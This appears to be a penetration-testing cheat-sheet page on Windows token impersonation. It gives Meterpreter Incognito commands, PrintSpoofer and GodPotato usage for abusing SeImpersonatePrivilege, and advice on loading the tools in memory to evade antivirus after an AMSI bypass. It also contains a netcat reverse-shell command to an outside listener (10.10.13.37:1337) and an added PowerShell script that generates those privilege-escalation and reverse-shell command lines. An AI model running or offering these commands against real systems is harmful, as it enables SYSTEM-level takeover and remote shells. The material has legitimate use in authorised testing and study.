Hacker Mind

Impersonate Token


Last updated 6 months ago

Meterpreter Incognito

meterpreter > load incognito

# list all tokens (-u = user tokens, -g = group tokens)
meterpreter > list_tokens -u

# impersonate a token: quote the name and double the backslash so it survives the Meterpreter parser
meterpreter > impersonate_token 'DOMAIN\\username'

SeImpersonatePrivilege

If antivirus is present and you are able to bypass AMSI, it is better to use Invoke-ReflectivePEInjection to load printspoofer.exe or godpotato.exe in memory instead of dropping them to disk.

The tricky part is that reflective loading makes it awkward to pass arguments to the exe, so the tip is to modify the exe so it needs no arguments: hardcode the command it runs (a reverse shell, for example).

The Meterpreter multi-session tricks (see the meterpreter-tricks link in the references below) will make your life easier.

Check first whether you hold the privilege at all:

whoami /priv

# look for SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege); if it shows "Disabled" it is still present in the token and a process can enable it itself

PrintSpoofer

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

.\PrintSpoofer64.exe -i -c cmd

or

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"

GodPotato (latest of the potato family)

Pick the build that matches the .NET runtime installed on the target (GodPotato-NET2.exe, GodPotato-NET35.exe or GodPotato-NET4.exe):

.\GodPotato-NET4.exe -cmd "cmd /c whoami"
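Added example (not code from the original page or from the PrintSpoofer/GodPotato projects): a small PowerShell triage script that parses `whoami /priv` output, checks whether SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is present, and prints the PrintSpoofer / GodPotato command line matching the interactive vs. non-interactive use cases above. The tool directory `C:\Windows\Tasks`, the `nc64.exe` reverse shell and the listener `10.10.13.37:1337` are assumptions taken from the page's own examples; the embedded `whoami /priv` output is a constructed sample so the script also runs without a target.

```powershell
# Added example (not from the original page): triage token privileges from
# `whoami /priv` and choose the impersonation command line.
# Assumptions: tools live in C:\Windows\Tasks, listener is 10.10.13.37:1337.

function Get-TokenPrivileges {
    param([string[]]$WhoamiOutput)
    # If no output was supplied, run whoami /priv on the current host.
    if (-not $WhoamiOutput) { $WhoamiOutput = & whoami /priv }
    $privs = @{}
    foreach ($line in $WhoamiOutput) {
        # Privilege lines look like:
        # "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled"
        if ($line -match '^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$') {
            $privs[$Matches[1]] = $Matches[2]
        }
    }
    return $privs
}

function Get-ImpersonationPlan {
    param(
        [hashtable]$Privileges,
        [switch]$Interactive,
        [string]$ToolDir = 'C:\Windows\Tasks',
        [string]$ReverseShell = 'C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd'
    )
    $held = $Privileges.ContainsKey('SeImpersonatePrivilege') -or
            $Privileges.ContainsKey('SeAssignPrimaryTokenPrivilege')
    if (-not $held) {
        return 'Neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege is held; look at other privileges (SeBackup, SeRestore, SeDebug, ...).'
    }
    # "Disabled" only means the privilege is not currently enabled in the token;
    # a process can enable a privilege it holds, so presence is what matters.
    if ($Interactive) {
        # Interactive shell (bind/reverse shell, psexec.py): spawn SYSTEM in this console.
        return "$ToolDir\PrintSpoofer64.exe -i -c cmd"
    }
    # Non-interactive (WinRM, webshell, wmiexec.py, smbexec.py): fire a reverse shell and exit.
    return @(
        "$ToolDir\PrintSpoofer64.exe -c `"$ReverseShell`"",
        "$ToolDir\GodPotato-NET4.exe -cmd `"$ReverseShell`""
    ) -join "`n"
}

# Constructed sample of `whoami /priv` output (typical IIS / service account).
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

$privs = Get-TokenPrivileges -WhoamiOutput $sample
Get-ImpersonationPlan -Privileges $privs -Interactive
Get-ImpersonationPlan -Privileges $privs
```

On a live target call `Get-TokenPrivileges` without `-WhoamiOutput` so it runs `whoami /priv` itself; pass `-Interactive` only when you actually have a console you can keep, otherwise use the printed `-c` / `-cmd` form and catch the shell on your listener.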

reference: https://github.com/BeichenDream/GodPotato

Other Privileges

For other abusable privileges (SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, ...), use these:

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations

Other references:

https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session (Meterpreter multi-session management)
https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
https://github.com/dievus/printspoofer
Windows Privilege Escalation — Token Impersonation (SeImpersonatePrivilege), Medium